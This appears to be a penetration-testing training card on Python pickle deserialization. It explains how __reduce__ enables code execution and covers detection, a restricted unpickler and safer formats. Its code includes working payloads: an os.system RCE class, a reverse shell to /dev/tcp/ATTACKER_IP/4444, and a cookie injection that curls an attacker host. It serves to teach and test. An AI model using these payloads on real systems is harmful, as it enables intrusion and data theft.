Pickle deserialization

web_injection_logic Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Python's pickle module is the de facto serialization mechanism in the data science and machine learning ecosystem, and its exploitation surface has expanded dramatically as ML model files (.pkl, .pt, .joblib) are shared via public model hubs. The official Python documentation warns that the pickle module is not secure and that malicious pickle data can execute arbitrary code during unpickling. Researchers from Trail of Bits and HiddenLayer have documented that PyTorch .pt files and scikit-learn .pkl files loaded from untrusted sources (Hugging Face Hub, S3 buckets, email attachments) execute arbitrary Python code during torch.load() (with weights_only=False, the default before PyTorch 2.6) or joblib.load(), with no exploit sophistication required. Any web application that accepts serialized Python objects in cookies, API parameters, file uploads, or ML model endpoints is potentially vulnerable.

Core Concept

The pickle protocol is a stack-based virtual machine that reconstructs Python object graphs from a byte stream. When an object is pickled, pickle calls its __reduce__() method (via __reduce_ex__()), which returns a tuple whose first two elements are a callable and an argument tuple. The pickler writes these into the stream as a global reference (GLOBAL or STACK_GLOBAL) followed by a REDUCE opcode; during unpickling, REDUCE invokes callable(*args). The default Unpickler imports whatever module and attribute the stream names, so an attacker who controls the pickle stream can specify os.system as the callable and any shell command string as the argument.

The __reduce__ method is the standard exploitation primitive. A malicious pickle is constructed by serializing an object whose __reduce__ returns (os.system, ("id",)). When pickle.loads() processes this byte stream, it calls os.system("id") — arbitrary code execution with the privileges of the Python process.
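The mechanism can be observed safely by swapping os.system for a harmless callable. The sketch below uses a hypothetical Demo class that reduces to the builtin len, then lists the opcodes with the standard pickletools module, which parses the stream without executing it: the callable is recorded as a STACK_GLOBAL reference and only invoked by REDUCE when the stream is loaded.

```python
import pickle
import pickletools


class Demo:
    """Hypothetical class: __reduce__ tells pickle to rebuild it as len("abc")."""

    def __reduce__(self):
        # (callable, args): the same shape an attacker would use with os.system
        return (len, ("abc",))


# Protocol 4 records the callable as module/name strings plus STACK_GLOBAL
stream = pickle.dumps(Demo(), protocol=4)

# Static listing: pickletools decodes opcodes but never executes them
opcode_names = [op.name for op, _arg, _pos in pickletools.genops(stream)]
print(opcode_names)

# Loading runs REDUCE, i.e. calls len("abc"); the result is an int, not a Demo
result = pickle.loads(stream)
print(result)  # 3
```

Note that the loaded value is whatever the callable returns, which is why the object's class never needs to exist on the target.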

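Magic bytes for pickle streams:
- Protocol 0 (ASCII) and protocol 1 (binary): no header; protocol 0 streams typically begin with an opcode character such as ( (MARK) or c (GLOBAL).
- Protocol 2: begins with \x80\x02.
- Protocol 3: begins with \x80\x03 (the default in Python 3.0 to 3.7).
- Protocol 4: begins with \x80\x04 (the default since Python 3.8).
- Protocol 5: begins with \x80\x05.
Every protocol ends the stream with the STOP opcode, a single . byte.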
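Because protocol 0 and 1 streams carry no header, a magic-byte check alone misses them. A minimal sketch, assuming the input is raw bytes: read the PROTO header when present, and otherwise ask pickletools.genops, which parses opcodes without importing or calling anything, whether the bytes form exactly one complete pickle ending in STOP. The helper names are illustrative, and the parse check is a heuristic rather than a proof.

```python
import pickle
import pickletools
from typing import Optional


def declared_protocol(data: bytes) -> Optional[int]:
    """Return the protocol from a PROTO header (0x80 + version byte), or None."""
    if len(data) >= 2 and data[0] == 0x80 and 2 <= data[1] <= 5:
        return data[1]
    return None


def parses_as_pickle(data: bytes) -> bool:
    """True if the bytes parse as one pickle whose STOP opcode is the final byte.

    pickletools.genops only decodes opcodes and their arguments, so it is
    safe to run on untrusted input; nothing is imported or executed.
    """
    last = None
    try:
        for opcode, _arg, pos in pickletools.genops(data):
            last = (opcode.name, pos)
    except ValueError:  # unknown opcode, truncated argument, or no STOP
        return False
    return last is not None and last[0] == "STOP" and last[1] == len(data) - 1


for proto in range(6):
    blob = pickle.dumps({"a": [1, 2]}, protocol=proto)
    print(proto, declared_protocol(blob), parses_as_pickle(blob))
```

Combining both checks catches header-less protocol 0/1 values that a prefix test skips, while rejecting ordinary text and JSON.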

Cloudpickle and dill extend pickle and are equally vulnerable — they serialize closures and lambdas, giving attackers even more expressive payloads.

Safe alternatives: json, msgpack, protobuf, and orjson do not support arbitrary object instantiation. For ML models, safetensors is the format specifically designed to eliminate the pickle attack surface. Never call pickle.loads(), joblib.load(), or torch.load() on data from an untrusted source without cryptographic provenance verification (signing + signature check before loading).
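The verify-before-loading rule can be sketched with the standard library: hash the file in chunks and refuse to hand it to any loader unless its SHA-256 digest matches a value obtained out of band. This is a minimal sketch; the helper names are hypothetical, and where the expected digest comes from (a signed manifest or trusted registry) is an assumption. A pinned digest proves integrity, while the signature check is what establishes who produced the file.

```python
import hashlib


def sha256_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in fixed-size chunks so large model files need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def require_digest(path: str, expected_hex: str) -> None:
    """Raise ValueError unless the file's SHA-256 matches the pinned hex digest.

    Call this before handing the file to any loader.
    """
    actual = sha256_file(path)
    if actual != expected_hex.lower():
        raise ValueError(f"digest mismatch for {path}: got {actual}")
```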

Technical Deep-Dive

# ── Crafting a malicious pickle payload ───────────────────────────────────
import pickle, os, base64

class RCEPayload:
    """Malicious class — __reduce__ executes a shell command on deserialization."""
    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        # pickle calls: os.system(self.command) during loads()
        return (os.system, (self.command,))

# Payload 1: simple command execution
payload = pickle.dumps(RCEPayload("id > /tmp/rce_proof.txt"))
print("[+] Raw payload bytes (hex):", payload.hex())
print("[+] Base64:", base64.b64encode(payload).decode())
# b64 will begin with gASV... (protocol 4) or gAJ... (protocol 2)

# Payload 2: reverse shell via subprocess
import subprocess

class RevShell:
    def __reduce__(self):
        cmd = "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
        return (subprocess.check_output, (["/bin/bash", "-c", cmd],))

revshell_payload = pickle.dumps(RevShell())
print("[+] Reverse shell payload (b64):", base64.b64encode(revshell_payload).decode())

# ── Detection: identify pickle magic bytes in a cookie or parameter ────────
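# Protocol 2+ streams start with the PROTO opcode (0x80) followed by the version byte.
# Header-less protocol 0/1 pickles are not detected by this check.
def is_pickle(data: bytes) -> bool:
    return data[:2] in (b'\x80\x02', b'\x80\x03', b'\x80\x04', b'\x80\x05')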

# Test against a cookie value
cookie_value = "gASVIAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="
raw = base64.b64decode(cookie_value)
print("Is pickle?", is_pickle(raw))   # True

# ── Exploitation via cookie injection ─────────────────────────────────────
import requests

payload_b64 = base64.b64encode(pickle.dumps(RCEPayload("curl http://ATTACKER/$(id)"))).decode()
resp = requests.get(
    "https://app.example.com/dashboard",
    cookies={"session": payload_b64},
)
print(resp.status_code, resp.text[:200])

# ── Safe alternatives ──────────────────────────────────────────────────────
import json

# JSON: safe, no object instantiation
safe_data = json.loads(json.dumps({"user": "alice", "role": "admin"}))

# For ML models: use safetensors instead of torch.load()
# pip install safetensors
# from safetensors.torch import load_file
# tensors = load_file("model.safetensors")  # dict of name -> tensor; no pickle code runs

# Check for pickle magic bytes in captured HTTP traffic
# In Burp: Decoder tab → base64 decode a cookie → view as hex
# Magic bytes to look for: 80 02, 80 03, 80 04, 80 05

# Automated scan (bash, run in a shell rather than Python): flag base64 tokens
# in requests.txt whose first two decoded bytes are a pickle PROTO header
grep -oE '[A-Za-z0-9+/]{40,}={0,2}' requests.txt | while read -r b64; do
    magic=$(printf '%s' "$b64" | base64 -d 2>/dev/null | head -c 2 | xxd -p)
    case "$magic" in
        8002|8003|8004|8005) echo "[PICKLE] $b64" ;;
    esac
done
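The same scan can be done in Python, which also copes with URL-safe base64 and stripped padding. A minimal sketch; the find_pickle_tokens name and the 20-character minimum token length are arbitrary choices, and like the shell loop it only detects protocol 2+ headers.

```python
import base64
import binascii
import re
from typing import List

# Candidate tokens: standard or URL-safe base64 alphabet, optional padding
TOKEN_RE = re.compile(r"[A-Za-z0-9+/_-]{20,}={0,2}")
PICKLE_HEADERS = (b"\x80\x02", b"\x80\x03", b"\x80\x04", b"\x80\x05")


def find_pickle_tokens(text: str) -> List[str]:
    """Return base64 tokens in text whose decoded bytes start with a pickle PROTO header."""
    hits = []
    for token in TOKEN_RE.findall(text):
        # Normalise URL-safe characters and restore any stripped padding
        normalised = token.rstrip("=").replace("-", "+").replace("_", "/")
        normalised += "=" * (-len(normalised) % 4)
        try:
            raw = base64.b64decode(normalised, validate=True)
        except binascii.Error:  # impossible length or bad characters
            continue
        if raw[:2] in PICKLE_HEADERS:
            hits.append(token)
    return hits
```

Feeding it a raw Cookie header or a saved request body returns only the tokens worth decoding by hand.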

Security Assessment Methodology

Identify Python application indicators: Check the Server and X-Powered-By headers (for example, Server: Werkzeug or Server: gunicorn), error tracebacks (Python stack traces expose the framework and Python version), file extensions (.py, .wsgi), and exposed dependency files (requirements.txt, Pipfile).
Search for serialized data in all cookie values and parameters: Base64-decode (standard and URL-safe) every cookie and opaque parameter and check for pickle magic bytes (\x80\x02 through \x80\x05), remembering that protocol 0/1 streams have no header. Also look for .pkl, .pickle, .pt, and .joblib files accepted by file upload endpoints.
Craft a safe detection payload (OOB DNS): Build a pickle that runs nslookup or curl against an out-of-band host you control (a Burp Collaborator or interactsh domain). Submit it and monitor for the DNS callback. This confirms deserialization without writing files.
Escalate to command execution: Replace the DNS payload with id > /tmp/pickle_rce_proof. Confirm file creation via a subsequent read (if the app has a file-reading endpoint) or via a web-accessible path.
Test ML model upload endpoints: If the application accepts model file uploads, submit a .pkl or .pt file containing a malicious pickle and watch for an OOB callback when the model is loaded.
Test all serialization libraries: If cloudpickle or dill appears in requirements.txt, test with those libraries' serialization formats as well (they share the pickle protocol).
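Once a captured value or uploaded model file is confirmed to be a pickle, its imports can be listed offline before anything is loaded. A minimal heuristic sketch built on pickletools.genops, which never executes the stream; the referenced_globals name is hypothetical, and STACK_GLOBAL operands are recovered by tracking recently pushed strings and memo entries, which a deliberately obfuscated stream could defeat.

```python
import pickletools
from typing import Dict, List, Optional, Tuple

# Opcodes that push a string constant onto the unpickler's stack
STRING_OPS = {
    "STRING", "BINSTRING", "SHORT_BINSTRING",
    "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8",
}
MEMO_PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
MEMO_GET_OPS = {"GET", "BINGET", "LONG_BINGET"}


def referenced_globals(data: bytes) -> List[Tuple[str, str]]:
    """List (module, name) pairs the stream would import, without unpickling it.

    Heuristic: STACK_GLOBAL operands are assumed to be the two most recent
    string pushes (including memo lookups); "?" marks unresolved values.
    """
    found: List[Tuple[str, str]] = []
    strings: List[Optional[str]] = []  # recent string pushes, newest last
    memo: Dict[int, Optional[str]] = {}  # memo index -> string, or None if not a string
    top: Optional[str] = None          # string on top of the stack, if the last push was one
    for opcode, arg, _pos in pickletools.genops(data):
        name = opcode.name
        if name in STRING_OPS:
            top = arg
            strings.append(arg)
        elif name == "MEMOIZE":
            memo[len(memo)] = top      # MEMOIZE stores the top of stack at the next index
        elif name in MEMO_PUT_OPS:
            memo[arg] = top
        elif name in MEMO_GET_OPS:
            top = memo.get(arg)
            strings.append(top)
        elif name in ("GLOBAL", "INST"):
            module, attr = arg.split(" ", 1)  # pickletools joins module and name with a space
            found.append((module, attr))
            top = None
        elif name == "STACK_GLOBAL":
            module, attr = (strings[-2], strings[-1]) if len(strings) >= 2 else (None, None)
            found.append((module or "?", attr or "?"))
            top = None
        elif name != "FRAME":
            top = None
    return found
```

Run against the decoded cookie_value from the detection example, it should report ("posix", "system"), that is, os.system on a POSIX host; plain data such as dicts and lists yields an empty list.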

Defensive Countermeasure: Never call pickle.loads() on data from any untrusted source. Replace pickle-based session cookies with cryptographically signed JSON (for example, itsdangerous's URLSafeTimedSerializer, which Flask uses for its default session cookie). For ML model distribution, enforce the safetensors format and verify a cryptographic signature (a SHA-256 digest plus a signature from a trusted registry) before loading any model file. Add pickle to a forbidden-import list in CI static analysis; Bandit, for instance, flags pickle imports and calls (checks B403 and B301).
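The signed-JSON replacement can be sketched with only the standard library to show what a library such as itsdangerous does for you: serialize with json, append an HMAC-SHA256 tag, and verify the tag with a constant-time comparison before parsing. This is a minimal sketch, not itsdangerous's wire format; SECRET_KEY and the function names are hypothetical, and it omits the timestamp and expiry that a timed serializer adds.

```python
import base64
import hashlib
import hmac
import json
from typing import Any, Dict

SECRET_KEY = b"replace-with-a-random-server-side-secret"  # hypothetical; load from config


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_session(payload: Dict[str, Any]) -> str:
    """Serialize to JSON (data only, no object instantiation) and append an HMAC tag."""
    body = json.dumps(payload, separators=(",", ":"), sort_keys=True).encode("utf-8")
    tag = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    return f"{_b64(body)}.{_b64(tag)}"


def load_session(cookie: str) -> Dict[str, Any]:
    """Verify the tag first; only an authentic cookie ever reaches json.loads."""
    try:
        body_b64, tag_b64 = cookie.split(".")
        body, tag = _unb64(body_b64), _unb64(tag_b64)
    except ValueError as exc:  # wrong number of parts or undecodable base64
        raise ValueError("malformed session cookie") from exc
    expected = hmac.new(SECRET_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("bad session signature")
    return json.loads(body)
```

Even with the key leaked, an attacker could forge only JSON data, not code, because json.loads never instantiates arbitrary objects.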

Common Assessment Errors

Assuming only cookies are affected: Pickles appear in POST body parameters, URL query strings, file uploads, and even Redis/Memcached cache values that the application later deserializes. Check all data paths.
Forgetting that dill and cloudpickle are equally vulnerable: If pickle is replaced with dill or cloudpickle, the vulnerability is identical. Search for all three in requirements.txt.
Using a blocking payload in a blind context: os.system() blocks until the command completes, so a reverse shell payload will hang the request and tie up a worker. Use short OOB payloads (curl/DNS) in blind contexts to avoid causing a denial of service.
Missing ML model endpoints: torch.load(), joblib.load(), and numpy.load() with allow_pickle=True all deserialize pickle data internally. Model upload and load endpoints are often forgotten in assessments. PyTorch 2.6 changed torch.load()'s default to weights_only=True, so also look for explicit weights_only=False calls and older PyTorch versions.
Not checking the protocol version: Protocol 0 pickles (ASCII-based, no magic bytes) can be injected in contexts where binary bytes are not allowed. Check text-based parameters for values that start with ( or c and end with the . STOP opcode.
Assuming safe_load equivalents exist for pickle: Unlike PyYAML (which has safe_load), Python's pickle has no safe loading mode. The documented mitigation, overriding Unpickler.find_class() to allowlist globals, narrows the attack surface but is easy to get wrong; the protocol remains unsafe for untrusted input.
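Python's pickle documentation describes one partial mitigation: subclass pickle.Unpickler and override find_class() so that every global not explicitly allowlisted is refused. A minimal sketch of that pattern; the allowlist (datetime.datetime only) and the Demo class are assumptions for illustration. It reduces rather than removes risk, because every allowlisted callable becomes part of the attack surface.

```python
import datetime
import io
import pickle
from typing import Any

# Hypothetical allowlist: the only (module, name) globals this application expects
ALLOWED_GLOBALS = {("datetime", "datetime")}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allowlisted globals; everything else is refused."""

    def find_class(self, module: str, name: str) -> Any:
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes) -> Any:
    """Replacement for pickle.loads() that routes every global lookup through the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Demo:
    """Hypothetical stand-in for a malicious object: reduces to builtins.len."""

    def __reduce__(self):
        return (len, ("abc",))


ok = restricted_loads(pickle.dumps({"user": "alice", "when": datetime.datetime(2024, 1, 1)}))
print(ok["when"].year)  # 2024

try:
    restricted_loads(pickle.dumps(Demo()))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)  # blocked: global 'builtins.len' is forbidden
```

Plain containers, strings, and numbers need no globals at all, so the allowlist only has to cover the classes the application genuinely stores.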

NICE Framework Alignment

Code	Knowledge/Skill/Task Statement	How This Card Develops It
K0009	Knowledge of application vulnerabilities	Explains the `__reduce__` mechanism that makes pickle deserialization inherently unsafe
K0070	Knowledge of system and application security threats and vulnerabilities	Connects pickle RCE to the ML model supply chain threat landscape
S0001	Skill in conducting vulnerability scans and recognizing vulnerabilities in security systems	Trains magic byte detection and OOB-first confirmation methodology
S0044	Skill in mimicking threat behaviors to test defenses	Develops pickle payload crafting skill using Python's own serialization API
T0028	Conduct and support authorized penetration testing on enterprise networks	Provides a complete methodology from detection through RCE confirmation
T0591	Perform penetration testing as required for new or updated applications	Frames pickle testing as required for Python applications and ML endpoints